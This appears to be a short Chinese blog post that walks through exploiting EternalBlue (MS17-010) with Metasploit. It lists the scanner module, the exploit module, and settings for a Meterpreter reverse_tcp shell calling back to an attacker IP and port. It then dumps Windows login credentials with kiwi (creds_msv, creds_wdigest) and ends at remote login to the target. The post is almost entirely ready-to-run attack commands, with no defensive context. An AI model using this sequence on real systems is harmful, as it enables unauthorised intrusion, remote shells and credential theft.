MSF永恒之蓝使用

简介: MSF永恒之蓝使用

MSF永恒之蓝MS17-010


1. 扫描


use auxiliary/scanner/smb/smb_ms17_010(加载模块扫描exp)

set RHOSTS 192.168.167.60(设置被扫描ip)

run(开始扫描,查看是否存在)


检测到可以使用永恒之蓝


2.


use exploit/windows/smb/ms17_010_eternalblue(加载模块)

set RHOSTS 192.168.167.60(IP)

set LHOST 192.168.167.48 (设置本机IP)

set LPORT 4444 (设置连接端口)

set payload windows/x64/meterpreter/reverse_tcp (设置payload) run (开始)

显示IP+端口>>>目标IP+端口(反弹成功)


shell(拿到权限)


3. 获取登录用户名密码


meterpreter > load kiwi

meterpreter > creds_msv

meterpreter > creds_wdigest


拿到登录密码


4. 下面就可以远程登录目标主机了

目录
相关文章
|
6月前
|
安全 网络安全 数据安全/隐私保护
【内网安全】横向移动&域控提权&NetLogon&ADCS&PAC&KDC&永恒之蓝
【内网安全】横向移动&域控提权&NetLogon&ADCS&PAC&KDC&永恒之蓝
【内网安全】横向移动&域控提权&NetLogon&ADCS&PAC&KDC&永恒之蓝
|
7月前
|
安全 网络协议 Shell
永恒之蓝(MS17-010)漏洞利用
永恒之蓝(MS17-010)漏洞利用
443 1
|
安全 网络安全 Windows
CVE-2017-0143永恒之蓝复现
CVE-2017-0143永恒之蓝复现
144 0
|
安全 开发工具 git
win10永恒之黑漏洞复现
win10永恒之黑漏洞复现
133 0
|
安全 Shell Linux
kali (永恒之蓝MS17_010)漏洞复现
kali (永恒之蓝MS17_010)漏洞复现
228 0
|
安全 数据安全/隐私保护 Windows
“永恒之蓝”勒索病毒检测+恢复工具
预测第二波WannaCry勒索病毒攻击即将到来! NSA黑客武器库泄漏的“永恒之蓝”发起的病毒攻击事件。 解决方案:勒索蠕虫病毒文件恢复工具 检测工具下载
171 0
|
安全 网络协议 关系型数据库
永恒之蓝漏洞利用
永恒之蓝漏洞利用
212 0
|
安全 网络安全 API
MS17-010永恒之蓝漏洞的浅谈与利用
MS17-010永恒之蓝漏洞的浅谈与利用
468 0
|
安全 网络协议 网络安全
永恒之蓝Windows10版踩坑复现
永恒之蓝Windows10版踩坑复现
1193 0
|
安全 Linux 区块链
勒索病毒WannaCry(永恒之蓝)
原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 、作者信息和本声明。否则将追究法律责任。http://solin.blog.51cto.com/11319413/1925890 勒索病毒WannaCry(永恒之蓝)   日前,"永恒之蓝"席卷全球,已经有90个国家遭到***。
2009 0